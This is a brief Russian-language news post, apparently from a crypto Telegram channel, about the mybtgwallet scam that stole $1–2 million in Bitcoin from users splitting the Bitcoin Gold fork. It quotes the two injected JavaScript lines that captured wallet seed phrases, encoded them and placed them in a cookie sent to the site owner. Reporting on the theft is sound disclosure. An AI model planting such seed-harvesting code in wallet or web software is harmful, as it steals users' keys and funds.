Кошелек mybtgwallet украл более $1млн у пользователей.Данный кошелек был рекомендован разработчиками проекта Bitcoin Gold в качестве официального кошелька. Mybtgwallet позволял произвести сплит форка, однако для этого необходимо было ввести сид Биткоин-кошелька.
Хакер добавил в протокол кошелька 2 строчки кода:
window.gtagm = mnemonic;
document.cookie='_gtag='+btoa(window.gtagm);Они заставляли браузер отправлять сиды Биткоин-кошельков непосредственно владельцу сайта mybtgwallet. По различным данным, таким образом было украдено от $1млн до $2млн в Биткоинах. 🔮
@bitoracle